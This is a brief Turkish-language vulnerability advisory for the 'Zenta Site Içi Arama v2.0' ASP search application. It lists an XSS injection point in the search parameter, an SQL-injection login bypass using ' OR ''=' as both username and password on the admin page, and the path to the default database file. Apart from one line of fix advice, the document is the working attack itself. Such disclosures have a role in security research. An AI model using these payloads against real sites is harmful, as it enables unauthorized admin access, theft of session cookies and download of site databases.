< ------------------- header data start ------------------- >

#############################################################

# Application Name : Zenta Site Içi Arama v2.0

# Vulnerable Type : Cross Site Scripting - Login Bypass

# Infection : Yönetici ve user cookieleri alinabilir. Admin giris paneli bypass edilebilir

# Bug Fix Advice : Zararli karakterler ve /admin/default.asp deki sorgular filtrelenmelidir

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

XSS :

/default.asp?search=[XSS]

Login bypass :

/admin/default.asp
k.adi : ’ OR ’’=’
sifre : ’ OR ’’=’

Default Database File :
/db/database.mdb

< -- bug code end of -- >